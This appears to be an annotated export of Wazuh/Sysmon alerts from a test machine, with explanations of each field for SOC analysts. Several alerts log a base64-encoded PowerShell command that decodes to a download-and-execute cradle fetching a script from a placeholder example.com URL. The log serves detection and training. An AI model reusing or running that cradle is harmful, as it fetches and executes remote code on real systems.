data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:06.839 ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ProcessId: 1816 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd86-680a-940b-000000000e00} ParentProcessId: 5364 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:06.839
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd86-680a-940b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5364
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:10.645+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:10.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  87
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534350.1788142
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:08.4452638Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285124
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:08.409 ProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ProcessId: 1816 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jawvpd1b.ilj.ps1 CreationUtcTime: 2025-04-24 22:39:08.409 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:08.409
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jawvpd1b.ilj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:08.409
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:13.838+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:13.838+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  84
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534353.1790907
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:11.1567475Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285151
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:09.790 ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ProcessId: 12064 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} ParentProcessId: 1816 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:09.790
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd8a-680a-970b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:13.923+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:13.923+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  88
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534353.1798974
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:11.4716773Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285155
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:11.459 ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} ProcessId: 12064 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k2zzxdgo.ova.ps1 CreationUtcTime: 2025-04-24 22:39:11.459 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:11.459
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd8d-680a-990b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12064
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k2zzxdgo.ova.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:11.459
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:16.763+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:16.763+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  85
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534356.1801743
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:14.6764079Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285203
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

